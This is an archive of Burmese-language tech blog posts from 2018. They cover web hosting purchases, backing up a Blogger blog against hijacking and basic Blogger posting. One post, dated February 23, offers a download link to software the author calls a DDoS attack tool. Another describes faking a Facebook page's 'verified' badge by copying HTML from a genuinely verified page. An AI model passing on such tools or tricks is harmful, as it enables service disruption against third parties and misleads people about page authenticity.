Wednesday, February 28, 2018

0 How to Create Facebook Page Verified ?? စမ်းကြည့်ဖို့ရာ..

Facebook က အပြောင်းအလှဲတွေ အတော်လုပ်နေတယ်ဗျာ....ကိုယ်ကတော့ မသိတစ်သိတော့ မြင်တွေ့ ရတဲ့ ဒီဇိုင်းတွေက တစ်နေ့တစ်မျိုး မရိုးအောင်ပါဘဲအဲ့လောက်ကြီးလည်းမဟုတ်ပါ ဘူး...နဲနဲ နဲ့ ပြောင်းပြောင်းနေတယ်....ပြောင်းတော့ ပြောင်းလှဲပေးရမှာဘဲလေ...ဒီတိုင်းကြီးဆိုတော့ လည်း ရိုးကုန် မှာပေါ့....Page ရှိသူများကတော့ မိမိ News Feed ညာဘက်ခြမ်းမှာ ကိုယ့်ပို့စ်ကို ဒီတစ်ပတ်အတွင်း
ဘယ်နှစ်ဦး Like လုပ်တယ် ဘယ်လောက်ဖတ်ကြတယ်ဆိုတာလေး ပြပေးတာကတော့ အားရစရာ ပါ ကိုယ့် Page ကလည်း ခုနောက်ပိုင်းမှာ....စာဖတ်တဲ့သူနဲလာပြီဗျ....မမြင်တွေ့ရတော့တာနဲ့ တူပါတယ်...ကိုယ်တင်တဲ့ ပို့စ်တွေကို မမြင်ရတော့ရင်ဖြင့်...ဘယ်မှာ ကြည့်လို့ ရပါ့မလဲ.....အပြောင်း အလှဲတွေ လုပ်နေတော့...ဟိုအရင်ကလို Like Follow လောက်နဲ့ မရတော့ဘူးလေ....


ခု Page တွေ မြန်မာပြည်က Page လေးတွေလည်း.. Verified လုပ်ထားတာတွေတွေ့ရပါတယ်..... ကိုယ့်လည်း စမ်းကြည့်တာ မရပါဘူး နှစ်နည်း သုံးနည်းတော့တွေ့တယ်.စမ်းကြည့်တာ အဆင်မပြေဘူး....
အဲဒီ Verified လုပ်တာနဲ့ ပတ်သက်တဲ့ ဆိုက်တစ်ခုကတော့ faceboook က ဘမ်းထားတယ်
ဗျ...မနေ့က ပေ့ခ်ျမှာ တင်စမ်းကြည့်တော့ ဖေ့ဘုတ်က ပိတ်ထားတာတွေ့တယ်...မြန်မာလို နာမည်ကြောင့်ဘဲလား မပြောတတ်....မိမိရဲ့ နာမည်ကိုတောင်မှ ဟိုအရင်ကလို ကိုယ့်ဝေါမှာ နာမည်သီး သန့် ထောက်ကြည့်လို့ မရတော့တာတွေ့ရတယ်ဗျ....
Verified လုပ်တာကတော့ Youtube မှာ  Facebook Developers How to Verified facebook Page လို့ ရိုက်ရှာကြည့်လိုက်ပါ....လွယ်တာကတော့ လွယ်ပါတယ်..ပထမဆုံး Verified လုပ်ထားတဲ့ ပေ့ခ်ျကိုသွားပြီးတော့ Html လေးယူတာပါ...
ပြီးရင် ကိုယ့် Page က နာမည်မှာထောက်ပြီး Html ဖွင့်ကာ ကူးထည့်တဲ့ နည်းလေးပါ...
အဲဒါနဲ့ပတ်သက်လို့ Youtube မှာ အများကြီးဘဲ ရှိတယ် စမ်းကြည့်ချင် စမ်းကြည့်ကြပေါ့..
ခု MPT ပေ့ခ်ျကလည်း လုပ်ထားတယ်...
7Day News Journal ကလည်း လုပ်ထားတယ်....
The Irrawaddy (Burmese Version) ကလည်း လုပ်ထားပါတယ်...
ကျန်တာတော့ သိပ်မတွေ့ရသေးဘူး...မြင်သာ ထင်သာရှိတာလေး ပြောပြတာပါ....
လုပ်ကြည့်ကြပေါ့.....

 Youtube မှာ များစွာ ရှိတဲ့ လင့်လေးကို ထည့်ပေးလိုက်တယ်...နှိပ်ပြီးသွားပါ...



Monday, February 26, 2018

0 web space တခုဝယ်မယ်ဆိုရင်

ကျနော် ၀ဘ်ဆိုဒ် hosting ၀ယ်ဖူးသလောက်အတွေ့ အကြုံလေးကို မျှလိုက်တာပါ .. domain နဲ့ hosting ၀ယ်ချင်တဲ့သူတွေအတွက် အသုံးဝင်မယ်ထင်ပါတယ် ..
ပထမဆုံး hosting ၀ယ်ရင် အများစုက diskspace နဲ့ bandwidth ကိုအရင်ဆုံးကြည့်ကြပါတယ် … diskspace လေးများမယ် bandwidth လေးရှိမယ်ဆိုရင် ဟ .. ကောင်းတယ်ဟဆိုပြီး ၀ယ်လိုက်ကြတာပဲ .. သတိထားသင့်ပါတယ် .. အဲဒါ Host လုပ်တဲ့ company တွေရဲ့ ရိုက်စားကွက်တခုပါ .. ၀ယ်ချင်အောင် diskspace ကို 100 GB 300 Gb, တချို့ဆို unlimited ထိပေးထားတာတွေ တွေ့ဖူးပါတယ် .. ကျန်တဲ့ email, sql features တွေလဲ ကောင်းကောင်းပေးထားတတ်ပါတယ် .. 


လှည့်ကွက်က addon domain မှာ လှည့်ထားတာပါ .. Addon domain ကို ထည့်လို့မရအောင်လုပ်ထားပါတယ် .. အဲဒီ hosting အတွက် Website တခု domain တခုတည်းကို သုံးရမယ်ဆိုတဲ့ သဘောပါ .. Diskspace တွေအများကြီးရှိနေပေမယ့်လဲ domain ထပ်လို့မရတော့ အဲဒီ GB တွေအများကြီးက အလကားအပိုဖြစ်သွားသလိုပေါ့ ..
ဥပမာပေးရရင် .. Myanmar friends လိုမျိုး ဖိုရမ်ဆိုဒ်ကြီးတခုက အကုန်ပေါင်းရင် အလွန်ရော အကျွံရော 10G ကုန်နိုင်ဖို့ဆိုတာ အကြာကြီးသုံးရပါတယ် .. ဘလော့တခု ပုံမှန် ၀ဘ်ဆိုဒ်တခုအတွက် 1G ရဲ့တ၀က်ဆိုတာ ကောင်းကောင်းသုံးလို့ရပါတယ် .. အဲဒီတော့ စဉ်းစားကြည့်ပေါ့ ..

Bandwidth ကတော့ .. Traffic တွေအတွက်ပါ .. ဆိုဒ်ကို လာလည်တဲ့ သူအရေအတွက်အနည်းအများကိုလိုက်ပြီး bandwidth ဘယ်လောက်လိုတယ်ဆိုတာ ရေးနိုင်ရင်ပိုကောင်းမှာပေါ့ .. ဥပမာ .. Yahoo google လို traffic အရမ်းများတဲ့ဆိုဒ်တွေအတွက် bandwidth များများလိုမှာပေါ့ .. ကျနော်ကတော့ အဲဒိကို သိပ်မစဉ်းစားပါဘူး .. ကိုယ့်ဆိုဒ်ကို လူလာရင်ကိုပဲ ကျေနပ်လှပြီ .. ဟီး …ပြီးတော့ sub domain ခွဲမယ် .. ကိုယ့် domain တခုတည်းကနေ .. ကျန်တဲ့ ကိစ္စတွေအတွက် domain အသေးလေးတခု ထပ်လုပ်မယ် … domain အသစ်တခု ၀ယ်စရာမလိုပဲ sub domain အသေးလေး လုပ်လိုက်တဲ့သဘော… ဥပမာ .. ကျနော့် ဘလော့လိုပေါ့ .. ၀ယ်ထားတဲ့ domain က http://www.ddieko.com/ .. ဒါပေမယ့် အဲဒါကို မသုံးချင်သေးဘူး .. ဘလော့အတွက် သက်သက် ဒိုမိန်းလေးတခု ခွဲလိုက်တယ် .. www.ddiekoblog.ddieko.com … အဲဒီလိုမျိုးလုပ်လိုက်လို့ရတယ်.. တခါတလေ Hosting company တွေက လူလည်ကျပြီး sub domain ကို နဲနဲလေးပဲပေးထားတတ်ကြပါတယ် .. အဲဒါကိုလဲ ကြည့်ဝယ်သင့်ပါတယ် ..

နောက်တခုက ftp account ဘယ်နှခုပေးလဲ .. Hosting တခုလုံးအတွက် တယောက်တည်း လုပ်မယ့် သူတွေအတွက် သိပ်ကိစ္စမရှိပေမယ့် .. Hosting တခုတည်းကို သုံးလေးယောက်လောက် share ပြီးသုံးချင်တယ် .. ကိုယ့်ဝဘ်ဆိုဒ်အတွက်ကိုယ် login ၀င်ဖို့ account သက်သက်ရှိချင်တယ်ဆိုရင်တော့ .. Ftp account ပိုများများရှိဖို့သင့်ပါတယ် ..

ပြီး .. Server က Linux လား wondows လားကိုလဲ ကြည့်သင့်ပါတယ် .. Web developer တွေအနေနဲ့ .. ကိုယ် ကျွမ်းကျင်တဲ့ ဘက်ပေါ်မူတည်ပြီး windows နဲ့ Linux ကို ရွေးကြပါတာ် .. ကျနော် windows တော့ မသုံးဖူးဘူး (သုံးဖူးတဲ့သူများရှိရင် ၀င်ရေးပေးကြပါခင်ဗျာ) .. ကျနော်သုံးတာက Linux Apache server ကိုသုံးပါတယ် .. Security ပိုကောင်းတယ်လို့ဆိုပါတယ် … ကျနော်ကတော့ phpmyadmin ကိုသုံးရတာ အဆင်ပြေလို့ သဘောကျတာပါ .. Windows အတွက်တော့ ASP သုံးတယ်လို့ ထင်ပါတယ် ..
mysql database လေးကိုလဲ တချက်လောက် check လိုက်ပါဦး .. ရိုးရိုးတန်းတန်း ၀ဘ်ဆိုဒ်တွေအတွက်မလိုပေမယ့် .. ကိုယ့်ဝဘ်ဆိုဒ်အတွက် application တွေထည့်ချင်ရင် database တွေလိုပါတယ် .. အဲဒီမှာလဲ တချို့ database နဲနဲလေးပေးထားတဲ့ဆိုဒ်တွေမှာဆို ဦးနှောက်စားရပါတယ် .. database ဘယ်လိုအခါမှာလိုမလဲ ..?? ရိုးရိုးတန်းတန်း ဒီဇိုင်းလောက်ပဲ ဆွဲထားတဲ့ဆိုဒ်တွေမှာဆိုရင်တော့ database မလိုပါဘူး .. အဲဒါတောင် guest bookကောင်းကောင်း contact formကောင်းကောင်း လိုမျိုး တိုလီမိုလီလေးတွေ ထည့်ချင်တယ်ဆိုရင်တောင် database လေးတခုလောက်တော့လိုပါတယ် .. ပြီးတော့ ကျနော်အခုဒီဆိုဒ်ကိုဆောက်ထားတဲ့ joomlaလို CMSဆိုဒ်တွေထည့်ချင်ပြီဆို ပိုတောင်လိုပါဦးမယ် .. joomla ဆိုဒ်တခုအတွက်ကို database တခု သက်သက်တောင်းပါတယ် .. အဲဒီမှာ ကိုယ်က database လေးတခုတည်းရှိမယ် ဆိုရင် database ပြန်ခွဲရ sql တွေ ပြန်ရေးရနဲ့ တော်တော်ဦးနှောက်စားမယ့်အလုပ်ပါ ..

ပြီးတော့ hosting ၀ယ်ရင် reseller package တွေဆိုတာလဲ ရှိပါတယ် .. တဆင့်ခံ ပြန်ရောင်းတာမျိုးပါ .. အဲဒီရောင်းတဲ့သူတွေက domain company တွေမှာ domain တွေhosting တွေကို ဈေးကောင်းကောင်းနဲ့ ရထားတတ်ပါတယ်.. အဲဒီ company မှာ domain တွေရာနဲ့ချီဝယ်ပြီး domain အရောင်းအ၀ယ်လုပ်နေတဲ့ သူတွေကို အဲဒီcompany က offer ကောင်းကောင်းပေးပြီးလုပ်ထားတာပါ .. ဥပမာ .. အပြင်မှာ domain တခုကို $3 ဆိုရင် သူတို့က domain provider ကပေးတဲ့ အရင်းဈေးအတိုင်း 1$ကျော်လောက်နဲ့ ပြန်ရကြပါတယ် .. Features တွေတော်တော်များများ ပေးထားတတ်ပါတယ် .. သူတို့ဆီကတဆင့်ဝယ်ချင်တယ်ဆိုလဲ မဆိုးပါဘူး .. ဒါပေမယ့် ဒိုမိန်းကောင်းကောင်းတွေကိုတော့ သိမ်းထားတတ်ကြပါတယ် .. ၀ယ်ချင်တယ်ဆိုရင်တော့ .. ရှေ့ကရေးထားတာလေးတွေကို သတိထားပါ .. ပြီးတော့ .. သူတို့ရှိပြီးသား Webspace ကို ခွဲပြီးရောင်းတာမို့လို့ .. ၀ယ်ရင် နဲနဲသတိထားပါ .. Ftp ပိုင်းမှာ ဘယ်လိုခွဲထားလဲ သေချာမေးပြီးမှ ၀ယ်သင့်ပါတယ် ..
ပြီးတော့ ပိုက်ပိုက်တတ်နိုင်ရင် ..

ဗီဒီယိုဆိုဒ်လို ဆိုဒ်ကြီးမျိုး database ကြီးတဲ့ ဆိုဒ်မျိုးဆောက်ချင်ရင် ကိုယ်ပိုင် server ရှိချင်ရင်တော့ ပိုက်ဆံပိုအကုန်ခံပြီး dedicated server ၀ယ်ပေါ့ .. ဒါကတော့ pro တွေမှ လုပ်မယ့်အတွက် ကျနော်ရှင်းပြမနေတော့ပါဘူး ..

အသေးအဖွားလေးများ ..
ကိုယ့် hosting မှာ ဘာပါမလဲ .. ဥပမာ Cpanel လိုမျိုးပေါ့ .. Joomla လို CMS တွေပါတဲ့ Fantistico Software လေးတွေ file manager တွေ domain တွေကို တစုတရုံးတည်း သုံးရလွယ်အောင်လုပ်ပေးထားတာပါ .. ပါရင်တော့ ပိုကောင်းတာပေါ့ .. မပါရင်လဲ ကိစ္စတော့မရှိပါဘူး ..
နောက်တခုကတော့ web mail လိုချင်တဲ့သူတွေအတွက်ပါ.. ကိုယ်hosting လုပ်တဲ့ company က web mail ပေးတယ်ဆိုရင်လဲ ယူလိုက်ရုံပေါ့ .. ဒါကတော့ သိပ် ပြသနာမရှိပါဘူး .. web mail ဆိုတော့ security အတွက် နဲနဲပိုကောင်းတာပေါ့ ..

ဒိုမိန်းဝယ်ရင် ..
ကျနော် hosting လဲတာ ၃ခါလောက်ရှိပါပြီ .. ပထမအခေါက်တုန်းက ကျနော် ခံလိုက်ရဘူးလို့ပါ .. Domain host လုပ်တဲ့ company ကို မကြိုက်လို့ တခြား company တခုကို ပြောင်းချင်တယ်ဆိုရင် .. Domain transfer အတွက် service charge ဆိုတာ ပေးရပါတယ် .. အဲဒါကို စ ၀ယ်ကတည်းက ရှင်းအောင်မေးထားပါ .. မမေးထားရင် .. အဲဒီ company က လူလည်လုပ်ပြီး service charge တောင်းပါလိမ့်မယ် .. ပြောင်းလိုက်တဲ့ အဟောင်းမှာတခါ .. ပြောင်းချင်တဲ့ အသစ်မှာတခါ .. နှစ်ခါပေးနေရပါလိမ့်မယ် .. ပြီးတော့ ပြောင်းချင်ရင်လဲ .. ဒိုမိန်းသက်တမ်းမကုန်ခင် နောက်ဆုံးနှစ်လမတိုင်ခင်မှာ ပြောင်းပါ .. မဟုတ်ရင် .. ရစ်နေပါလိမ့်မယ် .. ရှင်းပါတယ် .. သူတို့က ပိုက်ဆံပိုလိုချင်တယ်လေ .. Customer ကို လက်လွတ်ခံမှာ မဟုတ်ပါဘူး ..
Domain ၀ယ်မယ်ဆိုရင် ကိုယ်ဝယ်ချင်တဲ့ hosting company ရဲ့ background ကို အရင်လေ့လာပါ .. Service ကကောဘယ်လိုလဲ .. အလွယ်ဆုံးနည်းကတော့ .. ကျနော် ညသန်းခေါင်ဖုန်းကောက်ဆက်တာပဲ .. Service ကောင်းတဲ့ company က response လုပ်ပါတယ် .. ပြီးတော့ technical ပိုင်း ကတ်သီးကတ်သတ်မေးခွန်းတွေမေးပါ .. ဟီး .. ဒါက ကျနော်လုပ်နေကျပဲ .. Hosting company ကောင်းကောင်းဆို သူ့မှာ technician ကောင်းကောင်းရှိရမယ်လေ .. အဲဒီလိုပါ .. ကျနော် အခု နောက်ဆုံးပြောင်းလိုက်တာ go daddy ကိုပြောင်းလိုက်ပါတယ် .. Service တွေကအစ features တွေအဆုံး ပေးထားတဲ့ ၀န်ဆောင်မှုကိုသဘောကျပါတယ် .. အဲဒီဆိုဒ်တခုကိုတော့ ကျနော်ကိုယ်တိုင်လဲ သုံးနေတော့ .. recommend လုပ်ပါတယ် ..

ပြီးတော့ domain manager. အဲဒီ account ကိုရထားရင် ကောင်းတဲ့အခွင့်အရေးပါပဲ .. hosting company ရဲ့ service တွေကို မကြိုက်လို့ပဲဖြစ်ဖြစ် hosting အသစ်တခုခုကို စမ်းသုံးချင်လို့ပဲဖြစ်ဖြစ် domain manager လေးရှိတော့ ကိုယ့်domain ကိုယ် အလွယ်တကူပြောင်းလို့ရပါတယ် .. အဲဒါကို များသောအားဖြင့် hosting company အသေးတွေမှာ မပေးထားတတ်ကြပါဘူး ... အဲဒါလေးရနိုင်ရင်တော့ အကောင်းဆုံးပါ ..

ခုတော့ hosting ၀ယ်တာနဲ့ ပက်သက်ပြီး သိသင့်တာလေးတွေပါပဲ .. နောက်တပတ်ကျရင် free domain နဲ့ hosting မလိုပဲ ကိုယ့်ကွန်ပျုတာပေါ်မှာ host လုပ်တဲ့ အကြောင်းကို ကျနော်ရေးပါဦးမယ် ..

အားလုံး ပျော်ရွှင်ကြပါစေ ..
ဒီဒီကို
 

0 Blog အဟက်မခံရအောင်ကာကွယ်နည်း

ကျနော် ဒီပို့စ်ကို နာမည်ဘယ်လိုပေးရမှန်းမသိ ဖြစ်နေတာ။ ခေါင်းစဉ်တွေများနေလို့ လေ ။ ဒီလိုဗျာ .. အစ်ကိုတစ်ယောက်ရဲ့ ဘလော့ Hack ခံလိုက်ရတယ်ဗျာ။ password ချိန်းခံလိုက်ရတယ်။ အရင်ကလည်း ကြားဖူးကြမှာပေါ့။ ဘာလို့ အဲလိုလုပ်တာလဲ၊ ဘယ်ကောင်လဲ၊ ယုတ်မာလိုက်တာ ဆိုပြီး ထိုင်ငြီးနေမယ့်အစား ကို့ကို အဲလို လုပ်ရင်ကော ဘယ်လိုလုပ်မလဲလို့ တွေးလိုက်ပါတယ်။ blog တွေ hack ခံရတော့ အဓိက အချိန်ဗျ။ တစ်ခြို့က post တွေ အားလုံးကို microsoft word နဲ့ သိမ်းထားကြတယ်။ အဲ ပြန်တင်ဖို့ save ထားတယ်ပဲ ထားပါတော့ ပို့ ရာကျော်ကို ထိုင်တင်မှာလား။ ပျင်းစရာကြီးဗျာ။ နည်းမယ့်အချိန်မဟုတ်ဘူး။ တော်ရုံလူဆိုရင် ဘလော့ ပြန်ရေးချင်စိတ် မရှိတော့ပါဘူး။ စကားများသွားပြီ ကြိုတင် ကာကွယ်ထားလို့ ရအောင် ပြောတော့မယ်နော်။ ဘလော့ကို hack ရင် gmail account ရဲ့ password ကို ပြောင်းသွားလိုက်ပါတယ်။ တစ်ခြို့ကျတော့ account တစ်ခုလုံးကို delete ပြစ်လိုက်ပါတယ်။


မိမိ အရင် ဘလော့ရဲ့ Layout – Edit HTML မှာ Download Full Template ကို နှိပ်ပြီး Template ကို Download လုပ်လိုက်ပါ။ Sidebar Widget တွေကိုလည်း ကူးထားလိုက်ပေါ့။ (လူတိုင်းသိပြီးသားပါ)ဒါက Template အတွက် ဖြစ်ပါတယ်။ နောက်တစ်ခုက ပို့စ်တွေ အတွက်ပါ။ draft.blogger.com ကို ၀င်လိုက်ပါ။ (လက်ရှိ blogger မှာ ၀င်ပြီးသားဆိုရင် နှိပ်လိုက်တာနဲ့ Sign in ၀င်ပြီးသား ဖြစ်ပါလိမ့်မယ်။ draft.blogger မှာ မိမိ ပို့စ်တွေ ဒေါင်းချင်တဲ့ blog ရဲ့ Settings ကို နှိပ်ပါ။ အခုလို Basic နေရာမှာ Import blog – Export blog – Delete blog လို့တွေ့ပါလိမ့်မယ်။ Export blog ကို နှိပ်လိုက်ပါ။

Image Hosting by Picoodle.com

Download Blog လို့ ပေါ်လာပါလိမ့်မယ်။ ဒေါင်းထားလိုက်ပါ။
Image Hosting by Picoodle.com
( တစ်ခုပြောချင်တာက file size ကို ကြည့်ထားလိုက်ပါ။ connection မငြိမ်ရင် post အားလုံး မပါလာပဲ ဖြစ်တတ်ပါတယ်။ ကျနော်ဆိုရင် ပထမတစ်ခါ ဒေါင်းတော့ ပို့စ် ၁၈၀ မှာ ၁၀၈ ခုပဲ ကျပါတယ်။ ကွန်မန့်တွေလည်း ပါမလာပါဘူး။ )
Image Hosting by Picoodle.com
Download လုပ်ပြီးတာနဲ့ mail account အခြားတစ်ခုနဲ့ blogger မှာ Blog အသစ်တစ်ခု ထပ်လုပ်ပါတယ်။ (သဘောပေါက်မှာပါနော်) Layout – Edit HTML ကနေ အရင်ဆုံးချထားတဲ့ Template ကို upload တင်ပါတယ်။ ပြီးရင် sidebar widget တွေ ထည့်ပါတယ်။ (ဒါလည်း သိပြီးသားနေမှာပါ) ပြီးရင် draft.blogger.com ကို ပြန်ဝင်ပါတယ်။ (အခု အသစ်လုပ်နေတဲ့ ဘလော့ရဲ့ draft Dashboard ကိုသွားရမှာ ဖြစ်ပါတယ်)။ Settings ကို နှိပ်ပြီး Import blog ကို နှိပ်ပါတယ်။
Image Hosting by Picoodle.com
အောက်ပါအတိုင်း ခုနက ဒေါင်းထားတဲ့ blog xml ဖိုင်ကို upload ပြန်တင်ပါတယ်။
Image Hosting by Picoodle.com

တင်ပြီးပြီ ဆိုရင် အောက်ပါအတိုင်း Edit posts နေရာမှာ အခုလို ပေါ်ပါတယ်။ တကယ်လို့ မိမိရေးထားတဲ့ ပို့စ် အားလုံးပါမလာဘူး၊ ကွန်မန့်တွေလည်း မပါဘူးဆိုရင် blog xml ဒေါင်းက မစုံလိုက်လို့ ဖြစ်ပါတယ်။ နောက်တစ်ခါ ထပ်ဒေါင်းပေးပါ။ (file size ကိုကြည့်ပေါ့။ ကျနော်ဆို ဒုတိယ တစ်ခါဒေါင်းမှ အားလုံးရပါတယ်)
Image Hosting by Picoodle.com
ဒါဆိုရင် မိမိဘလော့ရဲ့ ဒီဇိုင်းအားလုံး၊ widgetအားလုံး၊ posts အားလုံးနဲ့ Comments အားလုံးကို နောက်ထပ် mail account တစ်ခုနဲ့ Blog ထပ်လုပ်ပြီး ဖြစ်လို့ clone blog လေးတစ်ခု ရှိနေပါပြီ။ ဘာမှ မကြာလိုက်တဲ့ အချိန်လေးပါပဲ။ နောက်ပြီးရင် URL ဖြစ်ပါတယ်။ ကျနော်ဆိုရင် co.cc ကနေ Domain ယူထားတာ ဖြစ်တဲ့အတွက် အရင် www.thanlonengal.blogspot.com ကို www.thanlonengal.co.cc လုပ်ထားတာပါ။ blogspot ဆိုတဲ့ မူရင်း thanlonengal ပျက်သွားခဲ့ရင်တောင် co.cc ဒိုမိန်းကို နောက်ထပ် clone လုပ်ထားတဲ့ ဘလော့မှာ ပြောင်းသုံးလိုက်ပါမယ်။ ဒါဆိုရင် နောက်ထပ်လုပ်တဲ့ clone က www.thanlonengal.co.cc လင့်နဲ့ပဲ ဖြစ်တဲ့အတွက် Hack ခံလိုက်ရတယ် ဆိုရင်တောင် ခဏလေးနဲ့ မူရင်း url ကို ပြန်ရပါတယ်။ ဆုံးရှုံးမှု မရှိတဲ့အပြင် ဒိုမိန်းလေး ပြောင်းလိုက်ရုံပဲ ဖြစ်တဲ့အတွက် ဘယ်သူမှလည်း သိလိုက်မှာ မဟုတ်ပါဘူး။ ကြိုတင်ပြင်ဆင်ထားရတာလည်း မပင်ပန်းလှပါဘူး။ အကျိုးရှိလိမ့်မယ်လို့ ထင်ပါတယ်။ ဘယ်သူ hack တာလဲ၊ စိတ်ဓါတ်က ဆိုးလိုက်တာ လို့ ထိုင်ငြီးနေမလား ? ။ ကျနော် ပြောခဲ့တဲ့အတိုင်း ကြိုပြင်ထားမလား ?
ဟိုးအရင်ထဲက ဒီပို့စ်လေးမှာလည်း backup လုပ်နိုင်တဲ့ site တစ်ခုကို ညွှန်ပြပြီး ဖြစ်ပါတယ်။ ဒါပေမယ့် အခုနည်းက အရမ်းအဆင်ပြေပါတယ်။ အားလုံး ကျေနပ်ကြလိမ့်မယ်လို့လည်း မျှော်လင့်ပါတယ်ဗျာ ……. ။ စိတ်ချမ်းမြေ့ခြင်းကို အချိန်တိုင်း ပိုင်ဆိုင် နိုင်ကြပါစေ။

Friday, February 23, 2018

0 DDOS တိုက်တဲ့ Softeare ဆိုပဲ။


မနေ့က အင်တာနက်ပေါ်လျှောက်မွှေလိုက်တာ DDOS တိုက်တဲ့ Software တစ်ခုကောက်ရလာတယ်ဗျာ။ ဘယ်လိုသုံးရလဲတော့ ကျွန်တော်လဲ မသိပါဘူး။ ကိုယ်ဟာကိုယ်သာ စမ်းကြည့်လိုက်ကြပါ။ သုံးတတ်ရင်လည်း သုံးပါ။ မသုံးတတ်ရင်လဲ မသုံးပါနဲ့။ ဘယ်လိုသုံးရသလဲဆိုတာ ကျွန်တော့်ကိုပြန်မမေးကြဖို့တော့ ကြိုပြောထားချင်ပါတယ်။ ဒီကောင်တွေကို ကျွန်တော် မသုံးတတ်သလို သုံးလဲ မသုံးပါဘူး။ ကျွန်တော်ဟာ နည်းပညာလိုက်စားသူတစ်ဦးသာဖြစ်ပါတယ်။ ကျွန်တော် Hacker တစ်ယောက်မဟုတ်ပါဘူး။ ကြိုးစားလေ့လာရတဲ့ အကျိုးရလဒ်က အမြဲတမ်းအဖြူရောင်မဖြစ်နိုင်ပေမယ့် အတတ်နိုင်ဆုံး အဖြူရောင်ဖြစ်အောင်တော့ ကြိုးစားစေချင်ပါတယ်။အောက်မှာ ဒေါင်းလိုက်ပါ။
ဆန္ဒများစွာဖြင့်
သန့်သူရဦး
Download :: ifile.it

0 Blogging အပိုင်း (၃)

Blog တည်ဆောက်ပြီးပြီဆိုတော့ ပို့စ်တစ်ခုလောက်စတင်ကြည့်ရအောင်။ ပို့စ်တင်တဲ့နေရာမှာ နှစ်နေရာရှိတယ်။ တစ်ခုက Compose၊ နောက်တစ်ခုက Edit HTML။ ကျွန်တော်တို့တင်တဲ့နေရာမှာ Edit HTML ကနေပဲတင်ရမယ်။ ဘာလို့လဲဆိုတော့ Compose ကစာတွေကိုအစီအစဉ်ချပေးဖို့သာဖြစ်တယ်။ စာရေးဖို့မဟုတ်ဘူး။ အစီအစဉ်ချတယ်ဆိုတာက စာတွေကို ဘေး၊ ဘယ်ညာ၊ အလယ် ဘယ်မှာထားမလဲဆိုတာ၊ ပုံတွေကို ဘေး၊ဘယ်ညာ ညှိတာ၊ စာသားအရောင်ထည့်တာ၊စာလုံးပုံစံပြောင်းတာ၊ နံပါတ်စဉ်တပ်တာ၊ Movie တွေတင်တာ စတဲ့အလုပ်တွေကိုလုပ်ပေးဖို့ပဲဖြစ်တယ်။ အဲ့တော့စာရေးရင် Edit HTML မှာရေးမယ်။ ပြင်ရင် Compose မှာပြင်မယ်။ စလိုက်ရအောင်။ အောက်ကပုံကိုကြည့်ပါ။


ဒီပုံလေးကိုရှင်းပြမယ်။
အနီရောင်လေးနဲ့ဘောင်ခတ်ထားတဲ့နေရာက ကိုယ်တင်မယ့်ပို့စ်နဲ့ သက်ဆိုင်တဲ့ခေါင်းစဉ်ရေးဖို့နေရာပါ။
အစိမ်းရောက်လေးက ကိုယ်ဖော်ပြချင်တဲ့အကြောင်းအရာရေးဖို့နေရာလေးပါ။ တစ်ခုပြောစရာရှိတာက တော်တော်များများဟာ Compose မှာပဲ ရိုက်ကြတာပါ။ ပို့စ်မပေါ်ဘူးလားလို့မေးစရာရှိပါတယ်။ ပေါ်ပါတယ် ဒါပေမယ့် ကုတ်တွေထည့်ချင်တယ်ဆိုတာမျိုး တစ်ခုခု HTML Code တစ်ခုခု တင်မယ်ဆိုရင် အဲ့ဒီ့မှာ ကုတ်တွေများတော့ ရှုပ်ကုန်ရောပေါ့။ Compose ဆိုတာ ကျွန်တော်အထက်မှာပြောခဲ့သလို ကာလာထည့်မှာတို့ကို စာလုံးညှိတာ၊ ပို့စ်တွေကို ဘယ်ညှိလား၊ ညာညှိလား၊ အလယ်ညှိလား၊ နှစ်ဖက်ညီလား၊ ဒါမျိုးတွေကို ညှိပေးတာကို အဓိကထားလုပ်ပါတယ်။ အဲ့ဒီ့တော့ ကျွန်တော်တို့ ပို့စ်တွေကို Edit HTML နဲ့ပဲရေးကြရအောင်ဗျာ။ ကုတ်တွေရောမရောသိချင်ရင် ကျွန်တော်တို့ Compose နဲ့ရိုက်ပြီးရင် HTML နဲ့ပြန်ကြည့်ပါ ကုတ်တွေထွက်ကျလာပါလိမ့်မယ်။ html နဲ့ရိုက်ရင်တော့ ဘာကုတ်မှ ပေါ်မှာမဟုတ်ပါဘူး။
အနက်ရောက်လေးနဲ့ကတော့ ကိုယ်တင်လိုက်တဲ့ပို့စ်၊ ကိုယ်ရေးလိုက်တဲ့အကြောင်းအရာနဲ့ပတ်သတ်တာလေး ရေးဖို့ပါ။ Labels ဆိုသည်မှာ ကိုယ်ရေးထားသော စာနှင့် ကိုက်ညီသော နာမည်တစ်ခု ပေးတာပဲဖြစ်ပါတယ်။ ဥပမာအားဖြင့် ကိုယ်က ဆော့ဖ်ဝဲတစ်ခုအကြောင်း ရေးသားသည်ဆိုလျှင် Software လိုနာမည်မျိုး ပေးခြင်း ဖြစ်သည်။ Label ပေးတာကနောက်ပိုင်းမှာ မိမိရဲ့ ပိုစ့်များကို သက်ဆိုင်ရာ ကဏ္ဍအလိုက် ပြန်လည်ခွဲခြားရာမှာ အထူးအရေးပါပါတယ်။ ဒါကြောင့် စာတစ်ပုဒ် ရေးပြီးတိုင်းတွင် ယင်းစာနှင့် ပတ်သတ်တဲ့ Label များကို သတိမမေ့စေဘဲ မှတ်မှတ်သားသား ပေးသင့်ပါတယ်။ အဲ့နေရာမှာရေးလိုက်တာလေးက ကိုယ့်ဘလော့ဂ်ရဲ့ ဘေးဘား(ဆိုက်ဘား) မှာရှိတဲ့ Label ၊ အကြောင်းအရာအလိုက် ဆိုတဲ့နေရာမှာပေါ်ပါမယ်။ အဲ့ဆိုက်ဘားအကြောင်းကိုတော့ နောက်တစ်ခန်းဖြစ်တဲ့ Template ခန်းရောက်ရင်ပြောပြပါမယ်။
စာအားလုံးရိုက်ပြီးပြီဆိုရင်တော့ publish post ဆိုတာလေးကို နှိပ်ဖို့မမေ့ပါနဲ့ဗျာ။ ဘာဖြစ်လို့လဲဆိုရင် Publish ကိုမနှိပ်ရင် စာဖတ်သူ တင်တဲ့ပို့စ်ကို သူက ပေါ်ပေးမှာမဟုတ်ပါဘူး။
Preview ကတော့ကိုယ်ရေးထားတဲ့စာကို ဘလော့ဂ်ပေါ်မတင်ခင် အရင်စစ်ဆေးကြည့်တာပေါ့နော်။
1 ဆိုတဲ့နေရာလေးကတော့ ကိုယ်ရေးတဲ့စာကို ဖတ်သူများက ကော်မန့် Comment ပေးတာလက်ခံ၊မခံ ရွေးပေးရတာပါ။ လက်မခံချင်ရင်တော့ Don’t allow ကိုနှိပ်ခဲ့ပေါ့။
